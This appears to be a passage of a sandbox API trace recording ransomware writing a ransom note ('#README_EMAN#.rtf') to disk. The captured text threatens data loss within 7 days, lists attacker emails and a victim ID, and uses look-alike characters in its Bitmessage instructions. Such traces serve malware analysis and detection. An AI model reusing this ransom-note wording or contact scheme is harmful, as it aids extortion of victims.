(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\logs\\common\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.412] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.412] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.412] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 